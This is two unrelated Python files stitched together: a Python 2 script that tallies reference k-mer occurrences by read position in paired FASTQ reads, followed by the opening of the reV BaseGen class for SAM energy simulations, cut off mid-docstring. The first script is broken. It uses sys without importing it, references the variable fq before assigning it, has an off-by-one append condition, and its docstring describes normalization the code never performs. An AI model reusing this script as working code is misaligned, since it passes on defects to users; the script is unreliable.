import os
import argparse
import string
from collections import Counter
import random
sys.path.append(os.path.dirname(__file__));
import readSeq
import multiprocessing
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
KMER = 16
SUBLEN = 1000000
def getArgs():
parser = argparse.ArgumentParser(description="Count occurance of database kmers in reads", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-k', default=KMER, dest='kmer', metavar='<int>', type=int, help="kmer length")
parser.add_argument('-l', dest='sublen', metavar='<int>', type=int, help="perform analysis on first <int> bases [RDLEN - K + 1]")
parser.add_argument('-c', default=2, dest='cutoff', metavar='<int>', type=int, help="minimum allowed coverage")
parser.add_argument('-t', default=30, dest='targetCov', metavar='<int>', type=int, help="target coverage")
parser.add_argument('-p', '--plot', dest='plot', type=str, default=None, metavar="<file>", help='plot data and save as png to <file>')
parser.add_argument('fastaFile', type=str, help='Input FASTA file(s). Text or gzip')
parser.add_argument('fastqFile', nargs='+', help='Input FASTQ file(s). Text or gzip')
args = parser.parse_args()
return args
def getMers(seq, merLen):
for i in xrange(min(len(seq) - merLen + 1,SUBLEN)):
yield seq[i:i+merLen]
complements = string.maketrans('acgtACGT', 'tgcaTGCA')
def revComp(seq):
revCompSeq = seq.translate(complements)[::-1]
return revCompSeq
def tallyPositions(seq,counts,sublen=None):
readPos = 0
for mer in getMers(seq, KMER):
if mer in merCnts:
if readPos > len(counts):
counts.append(1)
else:
counts[readPos] += 1
readPos += 1
if sublen:
if readPos == sublen:
break
#end tallyPositions
def main():
"""
kmer based normization
call rand once
004
if avecov1|2 < mincov:
trash
elif avecov1|2 < target:
keep
elif random < target/avecov1|2:
keep
else:
trash
"""
args = getArgs()
global KMER
KMER = args.kmer
out=sys.stdout
#check to make sure input files exist
for fq in args.fastqFile:
if not os.path.exists(fq):
sys.stderr.write("ERROR: Input file '%s' does not exist. Exiting.\n" % fq)
sys.exit()
#count mers / create database
sys.stderr.write("Making k-mer database\n")
global merCnts
merCnts = Counter()
for record in readSeq.readSeq(args.fastaFile,fileType='fasta'):
for mer in getMers(record.seq, args.kmer):
sortMers = sorted([mer, revComp(mer)])
merCnts[mer] += 1
merCnts[revComp(mer)] += 1
#normalize reads
sys.stderr.write("Tallying occurrences of database kmers in reads\n")
seqIt = readSeq.readSeq(fq,paired=True)
record1,record2 = seqIt.next()
readLen = len(record1.seq)
sys.stderr.write("Read length = %d\n" % readLen)
tallyLen = readLen - args.kmer + 1
if args.sublen:
if args.sublen > tallyLen:
sys.stderr.write("sublen (-l) must be less than readlen - k + 1 : (found reads of length %d\n" % readLen)
sys.exit(-1)
tallyLen = args.sublen
counts1 = [0 for x in range(tallyLen)]
counts2 = [0 for x in range(tallyLen)]
tallyPositions(record1.seq,counts1,tallyLen)
tallyPositions(record2.seq,counts2,tallyLen)
total_reads = 1
fqName = ""
for fq in args.fastqFile:
for record1, record2 in seqIt:
tallyPositions(record1.seq,counts1,tallyLen)
tallyPositions(record2.seq,counts2,tallyLen)
total_reads += 1
fqName += fq+" "
counts1_perc = [ 100 * float(x)/total_reads for x in counts1 ]
counts2_perc = [ 100 * float(x)/total_reads for x in counts2 ]
out.write("#pos\tread1_count\tread1_perc\tread2_count\tread2_perc\n")
for i in range(tallyLen):
out.write("%i\t%i\t%0.2f\t%i\t%0.2f\n" % (i+1,counts1[i],counts1_perc[i],counts2[i],counts2_perc[i]))
if args.plot:
sys.stderr.write("Plotting data. Saving to %s\n" % args.plot)
plt.ioff()
xcoord = range(1,tallyLen+1)
plt.plot(xcoord,counts1_perc,color="red",linewidth=1.0,linestyle="-",label="Read 1")
plt.plot(xcoord,counts2_perc,color="green",linewidth=1.0,linestyle="-",label="Read 2")
leg_loc="upper right"
max_cnt = 0
max_pos = 0
for i in range(len(counts1)):
if counts1[i] > max_cnt or counts2[i] > max_cnt:
max_cnt = counts1[i] if counts1[i] > counts2[i] else counts2[i]
max_pos = i
if max_pos > 0.5*len(counts1) :
leg_loc="upper left"
plt.legend(loc=leg_loc,prop={'size':10})
plt.xlabel("Read Position")
plt.ylabel("Percent Reads with Database k-mer")
plt.title("Occurrence of reference k-mers (k = %i) in \n%s (# reads = %d)" % (args.kmer,fqName,total_reads))
plt.savefig(args.plot)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass | PypiClean |
/NREL_reV-0.8.1-py3-none-any.whl/reV/generation/base.py | from abc import ABC, abstractmethod
import copy
from concurrent.futures import TimeoutError
import logging
import pandas as pd
import numpy as np
import os
import psutil
import json
import sys
from warnings import warn
from reV.config.output_request import SAMOutputRequest
from reV.config.project_points import ProjectPoints, PointsControl
from reV.handlers.outputs import Outputs
from reV.SAM.version_checker import PySamVersionChecker
from reV.utilities.exceptions import (OutputWarning, ExecutionError,
ParallelExecutionWarning,
OffshoreWindInputWarning)
from reV.utilities import log_versions, ModuleName
from rex.resource import Resource
from rex.utilities.execution import SpawnProcessPool
logger = logging.getLogger(__name__)
ATTR_DIR = os.path.dirname(os.path.realpath(__file__))
ATTR_DIR = os.path.join(ATTR_DIR, 'output_attributes')
with open(os.path.join(ATTR_DIR, 'other.json'), 'r') as f:
OTHER_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'lcoe_fcr.json'), 'r') as f:
LCOE_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'single_owner.json'), 'r') as f:
SO_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'windbos.json'), 'r') as f:
BOS_ATTRS = json.load(f)
with open(os.path.join(ATTR_DIR, 'lcoe_fcr_inputs.json'), 'r') as f:
LCOE_IN_ATTRS = json.load(f)
class BaseGen(ABC):
"""Base class for reV gen and econ classes to run SAM simulations."""
# Mapping of reV requests to SAM objects that should be used for simulation
OPTIONS = {}
# Mapping of reV generation / econ outputs to scale factors and units.
OUT_ATTRS = copy.deepcopy(OTHER_ATTRS)
# Mapping of reV econ outputs to scale factors and units.
# Type is scalar or array and corresponds to the SAM single-site output
# This is the OUT_ATTRS class attr for Econ but should also be accessible
# to rev generation
ECON_ATTRS = copy.deepcopy(OTHER_ATTRS)
ECON_ATTRS.update(LCOE_ATTRS)
ECON_ATTRS.update(SO_ATTRS)
ECON_ATTRS.update(BOS_ATTRS)
ECON_ATTRS.update(LCOE_IN_ATTRS)
# SAM argument names used to calculate LCOE
# Note that system_capacity is not included here because it is never used
# downstream and could be confused with the supply_curve point capacity
LCOE_ARGS = ('fixed_charge_rate', 'capital_cost', 'fixed_operating_cost',
'variable_operating_cost')
def __init__(self, points_control, output_request, site_data=None,
drop_leap=False, memory_utilization_limit=0.4,
scale_outputs=True):
"""
Parameters
----------
points_control : reV.config.project_points.PointsControl
Project points control instance for site and SAM config spec.
output_request : list | tuple
Output variables requested from SAM.
site_data : str | pd.DataFrame | None
Site-specific input data for SAM calculation. String should be a
filepath that points to a csv, DataFrame is pre-extracted data.
Rows match sites, columns are input keys. Need a "gid" column.
Input as None if no site-specific data.
drop_leap : bool
Drop leap day instead of final day of year during leap years.
memory_utilization_limit : float
Memory utilization limit (fractional). This sets how many site
results will be stored in-memory at any given time before flushing
to disk.
scale_outputs : bool
Flag to scale outputs in-place immediately upon Gen returning data.
"""
log_versions(logger)
self._points_control = points_control
self._year = None
self._site_limit = None
self._site_mem = None
self._out_fpath = None
self._meta = None
self._time_index = None
self._sam_module = None
self._sam_obj_default = None
self._drop_leap = drop_leap
self.mem_util_lim = memory_utilization_limit
self.scale_outputs = scale_outputs
self._run_attrs = {'points_control': str(points_control),
'output_request': output_request,
'site_data': str(site_data),
'drop_leap': str(drop_leap),
'memory_utilization_limit': self.mem_util_lim}
self._site_data = self._parse_site_data(site_data)
self.add_site_data_to_pp(self._site_data)
output_request = SAMOutputRequest(output_request)
self._output_request = self._parse_output_request(output_request)
# pre-initialize output arrays to store results when available.
self._out = {}
self._finished_sites = []
self._out_n_sites = 0
self._out_chunk = ()
self._check_sam_version_inputs()
@property
def output_request(self):
"""Get the output variables requested from the user.
Returns
-------
output_request : list
Output variables requested from SAM.
"""
return self._output_request
@property
def out_chunk(self):
"""Get the current output chunk index range (INCLUSIVE).
Returns
-------
_out_chunk : tuple
Two entry tuple (start, end) indicies (inclusive) for where the
current data in-memory belongs in the final output.
"""
return self._out_chunk
@property
def site_data(self):
"""Get the site-specific inputs in dataframe format.
Returns
-------
_site_data : pd.DataFrame
Site-specific input data for gen or econ calculation. Rows match
sites, columns are variables.
"""
return self._site_data
@property
def site_limit(self):
"""Get the number of sites results that can be stored in memory at once
Returns
-------
_site_limit : int
Number of site result sets that can be stored in memory at once
without violating memory limits.
"""
if self._site_limit is None:
tot_mem = psutil.virtual_memory().total / 1e6
avail_mem = self.mem_util_lim * tot_mem
self._site_limit = int(np.floor(avail_mem / self.site_mem))
logger.info('Limited to storing {0} sites in memory '
'({1:.1f} GB total hardware, {2:.1f} GB available '
'with {3:.1f}% utilization).'
.format(self._site_limit, tot_mem / 1e3,
avail_mem / 1e3, self.mem_util_lim * 100))
return self._site_limit
@property
def site_mem(self):
"""Get the memory (MB) required to store all results for a single site.
Returns
-------
_site_mem : float
Memory (MB) required to store all results in requested in
output_request for a single site.
"""
if self._site_mem is None:
# average the memory usage over n sites
# (for better understanding of array overhead)
n = 100
self._site_mem = 0
for request in self.output_request:
dtype = 'float32'
if request in self.OUT_ATTRS:
dtype = self.OUT_ATTRS[request].get('dtype', 'float32')
shape = self._get_data_shape(request, n)
self._site_mem += sys.getsizeof(np.ones(shape, dtype=dtype))
self._site_mem = self._site_mem / 1e6 / n
logger.info('Output results from a single site are calculated to '
'use {0:.1f} KB of memory.'
.format(self._site_mem / 1000))
return self._site_mem
@property
def points_control(self):
"""Get project points controller.
Returns
-------
points_control : reV.config.project_points.PointsControl
Project points control instance for site and SAM config spec.
"""
return self._points_control
@property
def project_points(self):
"""Get project points
Returns
-------
project_points : reV.config.project_points.ProjectPoints
Project points from the points control instance.
"""
return self._points_control.project_points
@property
def sam_configs(self):
"""Get the sam config dictionary.
Returns
-------
sam_configs : dict
SAM config from the project points instance.
"""
return self.project_points.sam_inputs
@property
def sam_metas(self):
"""
SAM configurations including runtime module
Returns
-------
sam_metas : dict
Nested dictionary of SAM configuration files with module used
at runtime
"""
sam_metas = self.sam_configs.copy()
for v in sam_metas.values():
v.update({'module': self._sam_module.MODULE})
return sam_metas
@property
def sam_module(self):
"""Get the SAM module class to be used for SAM simulations.
Returns
-------
sam_module : object
SAM object like PySAM.Pvwattsv7 or PySAM.Lcoefcr
"""
return self._sam_module
@property
def meta(self):
"""Get resource meta for all sites in project points.
Returns
-------
meta : pd.DataFrame
Meta data df for sites in project points. Column names are meta
data variables, rows are different sites. The row index
does not indicate the site number if the project points are
non-sequential or do not start from 0, so a 'gid' column is added.
"""
return self._meta
@property
def time_index(self):
"""Get the resource time index data.
Returns
-------
_time_index : pandas.DatetimeIndex
Time-series datetime index
"""
return self._time_index
@property
def run_attrs(self):
"""
Run time attributes (__init__ args and kwargs)
Returns
-------
run_attrs : dict
Dictionary of runtime args and kwargs
"""
return self._run_attrs
@property
def year(self):
"""Get the resource year.
Returns
-------
_year : int
Year of the time-series datetime index.
"""
if self._year is None and self.time_index is not None:
self._year = int(self.time_index.year[0])
return self._year
@property
def tech(self):
"""Get the reV technology string.
Returns
-------
tech : str
SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
solarwaterheat, troughphysicalheat, lineardirectsteam, econ)
The string should be lower-cased with spaces and _ removed.
"""
return self.project_points.tech
@property
def out(self):
"""Get the reV gen or econ output results.
Returns
-------
out : dict
Dictionary of gen or econ results from SAM.
"""
out = {}
for k, v in self._out.items():
if k in self.OUT_ATTRS:
scale_factor = self.OUT_ATTRS[k].get('scale_factor', 1)
else:
scale_factor = 1
if scale_factor != 1 and self.scale_outputs:
v = v.astype('float32')
v /= scale_factor
out[k] = v
return out
@out.setter
def out(self, result):
"""Set the output attribute, unpack futures, clear output from mem.
Parameters
----------
result : list | dict | None
Gen or Econ results to set to output dictionary. Use cases:
- List input is interpreted as a futures list, which is unpacked
before setting to the output dict.
- Dictionary input is interpreted as an already unpacked result.
- None is interpreted as a signal to clear the output dictionary.
"""
if isinstance(result, list):
# unpack futures list to dictionary first
result = self.unpack_futures(result)
if isinstance(result, dict):
# iterate through dict where sites are keys and values are
# corresponding results
for site_gid, site_output in result.items():
# check that the sites are stored sequentially then add to
# the finished site list
if self._finished_sites:
if int(site_gid) < np.max(self._finished_sites):
raise Exception('Site results are non sequential!')
# unpack site output object
self.unpack_output(site_gid, site_output)
# add site gid to the finished list after outputs are unpacked
self._finished_sites.append(site_gid)
elif isinstance(result, type(None)):
self._out.clear()
self._finished_sites.clear()
else:
raise TypeError('Did not recognize the type of output. '
'Tried to set output type "{}", but requires '
'list, dict or None.'.format(type(result)))
@staticmethod
def _output_request_type_check(req):
"""Output request type check and ensure list for manipulation.
Parameters
----------
req : list | tuple | str
Output request of variable type.
Returns
-------
output_request : list
Output request.
"""
if isinstance(req, list):
output_request = req
elif isinstance(req, tuple):
output_request = list(req)
elif isinstance(req, str):
output_request = [req]
else:
raise TypeError('Output request must be str, list, or tuple but '
'received: {}'.format(type(req)))
return output_request
@staticmethod
def handle_leap_ti(ti, drop_leap=False):
"""Handle a time index for a leap year by dropping a day.
Parameters
----------
ti : pandas.DatetimeIndex
Time-series datetime index with or without a leap day.
drop_leap : bool
Option to drop leap day (if True) or drop the last day of the year
(if False).
Returns
-------
ti : pandas.DatetimeIndex
Time-series datetime index with length a multiple of 365.
"""
# drop leap day or last day
leap_day = ((ti.month == 2) & (ti.day == 29))
last_day = ((ti.month == 12) & (ti.day == 31))
if drop_leap:
# preference is to drop leap day if exists
ti = ti.drop(ti[leap_day])
elif any(leap_day):
# leap day exists but preference is to drop last day of year
ti = ti.drop(ti[last_day])
if len(ti) % 365 != 0:
raise ValueError('Bad time index with length not a multiple of '
'365: {}'.format(ti))
return ti
@staticmethod
def _pp_to_pc(points, points_range, sam_configs, tech,
sites_per_worker=None, res_file=None, curtailment=None):
"""
Create ProjectControl from ProjectPoints
Parameters
----------
points : int | slice | list | str | pandas.DataFrame
| reV.config.project_points.PointsControl
Single site integer,
or slice or list specifying project points,
or string pointing to a project points csv,
or a pre-loaded project points DataFrame,
or a fully instantiated PointsControl object.
points_range : list | None
Optional two-entry list specifying the index range of the sites to
analyze. To be taken from the reV.config.PointsControl.split_range
property.
sam_configs : dict | str | SAMConfig
SAM input configuration ID(s) and file path(s). Keys are the SAM
config ID(s) which map to the config column in the project points
CSV. Values are either a JSON SAM config file or dictionary of SAM
config inputs. Can also be a single config file path or a
pre loaded SAMConfig object.
tech : str
SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
solarwaterheat, troughphysicalheat, lineardirectsteam)
The string should be lower-cased with spaces and _ removed.
sites_per_worker : int
Number of sites to run in series on a worker. None defaults to the
resource file chunk size.
res_file : str
Filepath to single resource file, multi-h5 directory,
or /h5_dir/prefix*suffix
curtailment : NoneType | dict | str | config.curtailment.Curtailment
Inputs for curtailment parameters. If not None, curtailment inputs
are expected. Can be:
- Explicit namespace of curtailment variables (dict)
- Pointer to curtailment config json file with path (str)
- Instance of curtailment config object
(config.curtailment.Curtailment)
Returns
-------
pc : reV.config.project_points.PointsControl
PointsControl object instance.
"""
if hasattr(points, "df"):
points = points.df
pp = ProjectPoints(points, sam_configs, tech=tech, res_file=res_file,
curtailment=curtailment)
# make Points Control instance
if points_range is not None:
# PointsControl is for just a subset of the project points...
# this is the case if generation is being initialized on one
# of many HPC nodes in a large project
pc = PointsControl.split(points_range[0], points_range[1], pp,
sites_per_split=sites_per_worker)
else:
# PointsControl is for all of the project points
pc = PointsControl(pp, sites_per_split=sites_per_worker)
return pc
@classmethod
def get_pc(cls, points, points_range, sam_configs, tech,
sites_per_worker=None, res_file=None, curtailment=None):
"""Get a PointsControl instance.
Parameters
----------
points : int | slice | list | str | pandas.DataFrame | PointsControl
Single site integer,
or slice or list specifying project points,
or string pointing to a project points csv,
or a pre-loaded project points DataFrame,
or a fully instantiated PointsControl object.
points_range : list | None
Optional two-entry list specifying the index range of the sites to
analyze. To be taken from the reV.config.PointsControl.split_range
property.
sam_configs : dict | str | SAMConfig
SAM input configuration ID(s) and file path(s). Keys are the SAM
config ID(s) which map to the config column in the project points
CSV. Values are either a JSON SAM config file or dictionary of SAM
config inputs. Can also be a single config file path or a
pre loaded SAMConfig object.
tech : str
SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
solarwaterheat, troughphysicalheat, lineardirectsteam)
The string should be lower-cased with spaces and _ removed.
sites_per_worker : int
Number of sites to run in series on a worker. None defaults to the
resource file chunk size.
res_file : str
Filepath to single resource file, multi-h5 directory,
or /h5_dir/prefix*suffix
curtailment : NoneType | dict | str | config.curtailment.Curtailment
Inputs for curtailment parameters. If not None, curtailment inputs
are expected. Can be:
- Explicit namespace of curtailment variables (dict)
- Pointer to curtailment config json file with path (str)
- Instance of curtailment config object
(config.curtailment.Curtailment)
Returns
-------
pc : reV.config.project_points.PointsControl
PointsControl object instance.
"""
if tech not in cls.OPTIONS and tech.lower() != ModuleName.ECON:
msg = ('Did not recognize reV-SAM technology string "{}". '
'Technology string options are: {}'
.format(tech, list(cls.OPTIONS.keys())))
logger.error(msg)
raise KeyError(msg)
if sites_per_worker is None:
# get the optimal sites per split based on res file chunk size
sites_per_worker = cls.get_sites_per_worker(res_file)
logger.debug('Sites per worker being set to {} for '
'PointsControl.'.format(sites_per_worker))
if isinstance(points, PointsControl):
# received a pre-intialized instance of pointscontrol
pc = points
else:
pc = cls._pp_to_pc(points, points_range, sam_configs, tech,
sites_per_worker=sites_per_worker,
res_file=res_file, curtailment=curtailment)
return pc
@staticmethod
def get_sites_per_worker(res_file, default=100):
"""Get the nominal sites per worker (x-chunk size) for a given file.
This is based on the concept that it is most efficient for one core to
perform one read on one chunk of resource data, such that chunks will
not have to be read into memory twice and no sites will be read
redundantly.
Parameters
----------
res_file : str
Filepath to single resource file, multi-h5 directory,
or /h5_dir/prefix*suffix
default : int
Sites to be analyzed on a single core if the chunk size cannot be
determined from res_file.
Returns
-------
sites_per_worker : int
Nominal sites to be analyzed per worker. This is set to the x-axis
chunk size for windspeed and dni datasets for the WTK and NSRDB
data, respectively.
"""
if not res_file or not os.path.isfile(res_file):
return default
with Resource(res_file) as res:
if 'wtk' in res_file.lower():
for dset in res.datasets:
if 'speed' in dset:
# take nominal WTK chunks from windspeed
_, _, chunks = res.get_dset_properties(dset)
break
elif 'nsrdb' in res_file.lower():
# take nominal NSRDB chunks from dni
_, _, chunks = res.get_dset_properties('dni')
else:
warn('Could not infer dataset chunk size as the resource type '
'could not be determined from the filename: {}'
.format(res_file))
chunks = None
if chunks is None:
# if chunks not set, go to default
sites_per_worker = default
logger.debug('Sites per worker being set to {} (default) based on '
'no set chunk size in {}.'
.format(sites_per_worker, res_file))
else:
sites_per_worker = chunks[1]
logger.debug('Sites per worker being set to {} based on chunk '
'size of {}.'.format(sites_per_worker, res_file))
return sites_per_worker
@staticmethod
def unpack_futures(futures):
"""Combine list of futures results into their native dict format/type.
Parameters
----------
futures : list
List of dictionary futures results.
Returns
-------
out : dict
Compiled results of the native future results type (dict).
"""
out = {}
for x in futures:
out.update(x)
return out
@staticmethod
@abstractmethod
def _run_single_worker(points_control, tech=None, res_file=None,
output_request=None, scale_outputs=True):
"""Run a reV-SAM analysis based on the points_control iterator.
Parameters
----------
points_control : reV.config.PointsControl
A PointsControl instance dictating what sites and configs are run.
tech : str
SAM technology to analyze (pvwattsv7, windpower, tcsmoltensalt,
solarwaterheat, troughphysicalheat, lineardirectsteam)
The string should be lower-cased with spaces and _ removed.
res_file : str
Filepath to single resource file, multi-h5 directory,
or /h5_dir/prefix*suffix
output_request : list | tuple
Output variables requested from SAM.
scale_outputs : bool
Flag to scale outputs in-place immediately upon returning data.
Returns
-------
out : dict
Output dictionary from the SAM reV_run function. Data is scaled
within this function to the datatype specified in cls.OUT_ATTRS.
"""
def _parse_site_data(self, inp):
"""Parse site-specific data from input arg
Parameters
----------
inp : str | pd.DataFrame | None
Site data in .csv or pre-extracted dataframe format. None signifies
that there is no extra site-specific data and that everything is
fully defined in the input h5 and SAM json configs.
Returns
-------
site_data : pd.DataFrame
Site-specific data for econ calculation. Rows correspond to sites,
columns are variables.
"""
if inp is None or inp is False:
# no input, just initialize dataframe with site gids as index
site_data = pd.DataFrame(index=self.project_points.sites)
site_data.index.name = 'gid'
else:
# explicit input, initialize df
if isinstance(inp, str):
if inp.endswith('.csv'):
site_data = pd.read_csv(inp)
elif isinstance(inp, pd.DataFrame):
site_data = inp
else:
# site data was not able to be set. Raise error.
raise Exception('Site data input must be .csv or '
'dataframe, but received: {}'.format(inp))
if 'gid' not in site_data and site_data.index.name != 'gid':
# require gid as column label or index
raise KeyError('Site data input must have "gid" column '
'to match reV site gid.')
# pylint: disable=no-member
if site_data.index.name != 'gid':
# make gid the dataframe index if not already
site_data = site_data.set_index('gid', drop=True)
if 'offshore' in site_data:
if site_data['offshore'].sum() > 1:
w = ('Found offshore sites in econ site data input. '
'This functionality has been deprecated. '
'Please run the reV offshore module to '
'calculate offshore wind lcoe.')
warn(w, OffshoreWindInputWarning)
logger.warning(w)
return site_data
def add_site_data_to_pp(self, site_data):
"""Add the site df (site-specific inputs) to project points dataframe.
This ensures that only the relevant site's data will be passed through
to parallel workers when points_control is iterated and split.
Parameters
----------
site_data : pd.DataFrame
Site-specific data for econ calculation. Rows correspond to sites,
columns are variables.
"""
self.project_points.join_df(site_data, key=self.site_data.index.name)
@abstractmethod
def _parse_output_request(self, req):
"""Set the output variables requested from the user.
Parameters
----------
req : list | tuple
Output variables requested from SAM.
Returns
-------
output_request : list
Output variables requested from SAM.
"""
def _get_data_shape(self, dset, n_sites):
"""Get the output array shape based on OUT_ATTRS or PySAM.Outputs.
Parameters
----------
dset : str
Variable name to get shape for.
n_sites : int
Number of sites for this data shape.
Returns
-------
shape : tuple
1D or 2D shape tuple for dset.
"""
if dset in self.OUT_ATTRS:
return self._get_data_shape_from_out_attrs(dset, n_sites)
if dset in self.project_points.all_sam_input_keys:
return self._get_data_shape_from_sam_config(dset, n_sites)
return self._get_data_shape_from_pysam(dset, n_sites)
def _get_data_shape_from_out_attrs(self, dset, n_sites):
"""Get data shape from ``OUT_ATTRS`` variable"""
if self.OUT_ATTRS[dset]['type'] == 'array':
return (len(self.time_index), n_sites)
return (n_sites,)
def _get_data_shape_from_sam_config(self, dset, n_sites):
"""Get data shape from SAM input config """
data = list(self.project_points.sam_inputs.values())[0][dset]
if isinstance(data, (list, tuple, np.ndarray)):
return (*np.array(data).shape, n_sites)
if isinstance(data, str):
msg = ('Cannot pass through non-scalar SAM input key "{}" '
'as an output_request!'.format(dset))
logger.error(msg)
raise ExecutionError(msg)
return (n_sites, )
def _get_data_shape_from_pysam(self, dset, n_sites):
"""Get data shape from PySAM output object"""
if self._sam_obj_default is None:
self._sam_obj_default = self.sam_module.default()
try:
out_data = getattr(self._sam_obj_default.Outputs, dset)
except AttributeError as e:
msg = ('Could not get data shape for dset "{}" '
'from object "{}". '
'Received the following error: "{}"'
.format(dset, self._sam_obj_default, e))
logger.error(msg)
raise ExecutionError(msg) from e
if isinstance(out_data, (int, float, str)):
return (n_sites,)
if len(out_data) % len(self.time_index) == 0:
return (len(self.time_index), n_sites)
return (len(out_data), n_sites)
def _init_fpath(self, out_fpath, module):
"""Combine directory and filename, ensure .h5 ext., make out dirs."""
if out_fpath is None:
return
project_dir, out_fn = os.path.split(out_fpath)
# ensure output file is an h5
if not out_fn.endswith('.h5'):
out_fn += '.h5'
if module not in out_fn:
extension_with_module = "_{}.h5".format(module)
out_fn = out_fn.replace(".h5", extension_with_module)
# ensure year is in out_fpath
if self.year is not None and str(self.year) not in out_fn:
extension_with_year = "_{}.h5".format(self.year)
out_fn = out_fn.replace(".h5", extension_with_year)
# create and use optional output dir
if project_dir and not os.path.exists(project_dir):
os.makedirs(project_dir, exist_ok=True)
self._out_fpath = os.path.join(project_dir, out_fn)
self._run_attrs['out_fpath'] = out_fpath
def _init_h5(self, mode='w'):
"""Initialize the single h5 output file with all output requests.
Parameters
----------
mode : str
Mode to instantiate h5py.File instance
"""
if self._out_fpath is None:
return
if 'w' in mode:
logger.info('Initializing full output file: "{}" with mode: {}'
.format(self._out_fpath, mode))
elif 'a' in mode:
logger.info('Appending data to output file: "{}" with mode: {}'
.format(self._out_fpath, mode))
attrs = {d: {} for d in self.output_request}
chunks = {}
dtypes = {}
shapes = {}
# flag to write time index if profiles are being output
write_ti = False
for dset in self.output_request:
tmp = 'other'
if dset in self.OUT_ATTRS:
tmp = dset
attrs[dset]['units'] = self.OUT_ATTRS[tmp].get('units',
'unknown')
attrs[dset]['scale_factor'] = \
self.OUT_ATTRS[tmp].get('scale_factor', 1)
chunks[dset] = self.OUT_ATTRS[tmp].get('chunks', None)
dtypes[dset] = self.OUT_ATTRS[tmp].get('dtype', 'float32')
shapes[dset] = self._get_data_shape(dset, len(self.meta))
if len(shapes[dset]) > 1:
write_ti = True
# only write time index if profiles were found in output request
if write_ti:
ti = self.time_index
else:
ti = None
Outputs.init_h5(self._out_fpath, self.output_request, shapes,
attrs, chunks, dtypes, self.meta, time_index=ti,
configs=self.sam_metas, run_attrs=self.run_attrs,
mode=mode)
def _init_out_arrays(self, index_0=0):
"""Initialize output arrays based on the number of sites that can be
stored in memory safely.
Parameters
----------
index_0 : int
This is the site list index (not gid) for the first site in the
output data. If a node cannot process all sites in-memory at once,
this is used to segment the sites in the current output chunk.
"""
self._out = {}
self._finished_sites = []
# Output chunk is the index range (inclusive) of this set of site outs
self._out_chunk = (index_0, np.min((index_0 + self.site_limit,
len(self.project_points) - 1)))
self._out_n_sites = int(self.out_chunk[1] - self.out_chunk[0]) + 1
logger.info('Initializing in-memory outputs for {} sites with gids '
'{} through {} inclusive (site list index {} through {})'
.format(self._out_n_sites,
self.project_points.sites[self.out_chunk[0]],
self.project_points.sites[self.out_chunk[1]],
self.out_chunk[0], self.out_chunk[1]))
for request in self.output_request:
dtype = 'float32'
if request in self.OUT_ATTRS and self.scale_outputs:
dtype = self.OUT_ATTRS[request].get('dtype', 'float32')
shape = self._get_data_shape(request, self._out_n_sites)
# initialize the output request as an array of zeros
self._out[request] = np.zeros(shape, dtype=dtype)
def _check_sam_version_inputs(self):
"""Check the PySAM version and input keys. Fix where necessary."""
for key, parameters in self.project_points.sam_inputs.items():
updated = PySamVersionChecker.run(self.tech, parameters)
sam_obj = self._points_control._project_points._sam_config_obj
sam_obj._inputs[key] = updated
def unpack_output(self, site_gid, site_output):
"""Unpack a SAM SiteOutput object to the output attribute.
Parameters
----------
site_gid : int
Resource-native site gid (index).
site_output : dict
SAM site output object.
"""
# iterate through the site results
for var, value in site_output.items():
if var not in self._out:
raise KeyError('Tried to collect output variable "{}", but it '
'was not yet initialized in the output '
'dictionary.')
# get the index in the output array for the current site
i = self.site_index(site_gid, out_index=True)
# check to see if we have exceeded the current output chunk.
# If so, flush data to disk and reset the output initialization
if i + 1 > self._out_n_sites:
self.flush()
global_site_index = self.site_index(site_gid)
self._init_out_arrays(index_0=global_site_index)
i = self.site_index(site_gid, out_index=True)
if isinstance(value, (list, tuple, np.ndarray)):
if not isinstance(value, np.ndarray):
value = np.array(value)
self._out[var][:, i] = value.T
elif value != 0:
self._out[var][i] = value
def site_index(self, site_gid, out_index=False):
"""Get the index corresponding to the site gid.
Parameters
----------
site_gid : int
Resource-native site index (gid).
out_index : bool
Option to get output index (if true) which is the column index in
the current in-memory output array, or (if false) the global site
index from the project points site list.
Returns
-------
index : int
Global site index if out_index=False, otherwise column index in
the current in-memory output array.
"""
# get the index for site_gid in the (global) project points site list.
global_site_index = self.project_points.sites.index(site_gid)
if not out_index:
output_index = global_site_index
else:
output_index = global_site_index - self.out_chunk[0]
if output_index < 0:
raise ValueError('Attempting to set output data for site with '
'gid {} to global site index {}, which was '
'already set based on the current output '
'index chunk of {}'
.format(site_gid, global_site_index,
self.out_chunk))
return output_index
def flush(self):
"""Flush the output data in self.out attribute to disk in .h5 format.
The data to be flushed is accessed from the instance attribute
"self.out". The disk target is based on the instance attributes
"self._out_fpath". Data is not flushed if _fpath is None or if .out is
empty.
"""
# handle output file request if file is specified and .out is not empty
if isinstance(self._out_fpath, str) and self._out:
logger.info('Flushing outputs to disk, target file: "{}"'
.format(self._out_fpath))
# get the slice of indices to write outputs to
islice = slice(self.out_chunk[0], self.out_chunk[1] + 1)
# open output file in append mode to add output results to
with Outputs(self._out_fpath, mode='a') as f:
# iterate through all output requests writing each as a dataset
for dset, arr in self._out.items():
if len(arr.shape) == 1:
# write array of scalars
f[dset, islice] = arr
else:
# write 2D array of profiles
f[dset, :, islice] = arr
logger.debug('Flushed output successfully to disk.')
def _pre_split_pc(self, pool_size=os.cpu_count() * 2):
"""Pre-split project control iterator into sub chunks to further
split the parallelization.
Parameters
----------
pool_size : int
Number of futures to submit to a single process pool for
parallel futures.
Returns
-------
N : int
Total number of points control split instances.
pc_chunks : list
List of lists of points control split instances.
"""
N = 0
pc_chunks = []
i_chunk = []
for i, split in enumerate(self.points_control):
N += 1
i_chunk.append(split)
if (i + 1) % pool_size == 0:
pc_chunks.append(i_chunk)
i_chunk = []
if i_chunk:
pc_chunks.append(i_chunk)
logger.debug('Pre-splitting points control into {} chunks with the '
'following chunk sizes: {}'
.format(len(pc_chunks), [len(x) for x in pc_chunks]))
return N, pc_chunks
def _parallel_run(self, max_workers=None, pool_size=os.cpu_count() * 2,
timeout=1800, **kwargs):
"""Execute parallel compute.
Parameters
----------
max_workers : None | int
Number of workers. None will default to cpu count.
pool_size : int
